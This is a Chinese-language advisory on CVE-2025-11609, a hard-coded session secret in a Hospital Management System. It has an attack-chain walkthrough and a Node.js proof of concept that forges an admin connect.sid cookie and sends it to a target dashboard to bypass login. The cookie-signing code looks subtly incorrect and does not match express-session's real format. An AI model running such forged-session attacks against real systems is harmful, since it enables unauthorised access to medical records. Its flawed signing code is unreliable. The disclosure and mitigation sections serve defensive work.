CVE-2025-11609：Hospital Management System硬编码加密密钥漏洞

漏洞信息

漏洞编号

CVE-2025-11609

漏洞类型

硬编码加密密钥（Use of Hard-coded Cryptographic Key）

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Hospital Management System 1.0

漏洞概述

CVE-2025-11609是code-projects Hospital Management System 1.0版本中存在的硬编码加密密钥漏洞。该漏洞位于express-session组件的session函数中，开发者在配置express-session时将secret参数硬编码为固定值"secret"。由于express-session使用该secret密钥对session ID进行签名以防止会话伪造，硬编码的密钥使得攻击者可以预测或伪造有效的会话标识符，从而绕过身份验证机制，冒充合法用户访问系统。

该漏洞的CVSS 3.1评分为3.7分，属于低危级别。攻击者可以通过网络远程发起攻击，无需任何身份认证和用户交互，但攻击复杂度较高，利用难度较大。漏洞的主要影响在于完整性方面——攻击者可以篡改会话数据或伪造会话，但对机密性和可用性影响有限。

该漏洞已被公开披露，相关的概念验证（PoC）代码已在GitHub上发布（仓库：lakshayyverma/CVE-Discovery），攻击者可以参考利用。考虑到Hospital Management System处理敏感的医疗数据，该漏洞可能导致患者信息泄露或未授权访问医疗记录，对医疗机构的信息安全构成潜在威胁。

技术细节

Hospital Management System 1.0在配置express-session中间件时，使用了硬编码的secret参数值"secret"。express-session是Node.js/Express框架中用于管理用户会话的中间件，其secret参数用于对session ID进行HMAC签名，防止会话ID被篡改或伪造。

技术原理：
1. 当用户登录后，服务器使用secret密钥对session ID进行签名，生成connect.sid cookie。
2. 客户端每次请求时携带该cookie，服务器验证签名以确认会话的合法性。
3. 由于secret被硬编码为"secret"，任何知道该密钥的攻击者都可以伪造有效的session ID。
4. 攻击者可以使用相同的secret密钥为自己的恶意会话生成有效的签名cookie。
5. 将伪造的cookie发送至服务器后，服务器验证签名通过，攻击者即可以合法用户身份访问系统。

利用方式：
- 攻击者首先获取源代码或通过信息泄露获知secret值为"secret"
- 使用express-session相同的签名算法（如SHA-256 HMAC）伪造目标用户的session ID
- 构造带有伪造connect.sid的HTTP请求，绕过身份验证
- 以管理员或其他高权限用户身份执行未授权操作

该漏洞属于CWE-798（Use of Hard-coded Credentials）类漏洞，是Web应用中常见的安全缺陷之一。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过下载Hospital Management System 1.0的开源代码或在公开仓库（如GitHub）中搜索，发现express-session配置中使用了硬编码的secret值"secret"。

STEP 2

步骤2：密钥获取

攻击者确认secret参数为固定字符串"secret"，该密钥用于对session ID进行HMAC签名。

STEP 3

步骤3：伪造会话

攻击者使用与express-session相同的HMAC-SHA256算法，结合已知的secret密钥"secret"，为任意session ID生成有效的签名。

STEP 4

步骤4：构造恶意请求

攻击者将伪造的connect.sid cookie注入到HTTP请求头中，冒充合法用户（如管理员）向目标服务器发送请求。

STEP 5

步骤5：绕过认证

服务器验证伪造的cookie签名通过，攻击者成功绕过身份验证，以高权限用户身份访问系统，执行未授权操作如查看患者记录、修改医疗数据等。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/* CVE-2025-11609 - Hospital Management System Hard-coded Secret PoC
 * Vulnerability: Hard-coded cryptographic key in express-session secret parameter
 * Affected: code-projects Hospital Management System 1.0
 * The secret is hardcoded as "secret" in the express-session configuration
 */

const crypto = require('crypto');
const express = require('express');
const session = require('express-session');

// The hardcoded secret used in the vulnerable application
const HARDCODED_SECRET = 'secret';

// Function to forge a valid session cookie using the known hardcoded secret
function forgeSessionCookie(sessionId) {
    // express-session uses HMAC-SHA256 to sign the session ID
    const signature = crypto
        .createHmac('sha256', HARDCODED_SECRET)
        .update(sessionId)
        .digest('base64')
        .replace(/=+$/, '')
        .replace(/\//g, '-')
        .replace(/\+/g, '_');

    const cookieValue = Buffer.from(sessionId).toString('base64')
        .replace(/=+$/, '')
        .replace(/\//g, '-')
        .replace(/\+/g, '_');

    return `s:${cookieValue}.${signature}`;
}

// Example: Forge a session cookie for admin user
const targetSessionId = 'admin_session_12345';
const forgedCookie = forgeSessionCookie(targetSessionId);
console.log('Forged Cookie:', forgedCookie);

// Use the forged cookie in an HTTP request to bypass authentication
const http = require('http');
const options = {
    hostname: 'target-hospital-app.com',
    port: 80,
    path: '/dashboard',
    method: 'GET',
    headers: {
        'Cookie': `connect.sid=${forgedCookie}`,
        'User-Agent': 'Mozilla/5.0'
    }
};

const req = http.request(options, (res) => {
    console.log(`Status: ${res.statusCode}`);
    let data = '';
    res.on('data', (chunk) => { data += chunk; });
    res.on('end', () => { console.log('Response:', data); });
});

req.on('error', (e) => { console.error(`Error: ${e.message}`); });
req.end();

/*
 * Mitigation: Replace the hardcoded secret with a strong, randomly generated
 * value stored in environment variables or a secrets management system.
 * Example fix:
 * app.use(session({
 *     secret: process.env.SESSION_SECRET || crypto.randomBytes(64).toString('hex'),
 *     resave: false,
 *     saveUninitialized: false,
 *     cookie: { secure: true, httpOnly: true, sameSite: 'strict' }
 * }));
 */

影响范围

code-projects Hospital Management System 1.0

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）通过反向代理或WAF规则检测和阻止使用已知硬编码密钥签名的伪造cookie请求；2）在应用前端增加额外的身份验证层（如双因素认证）；3）监控异常会话活动，设置会话并发数量限制；4）尽快修改源代码中的secret为随机生成的强密钥并重新部署应用；5）对所有现有会话进行强制失效，要求用户重新登录。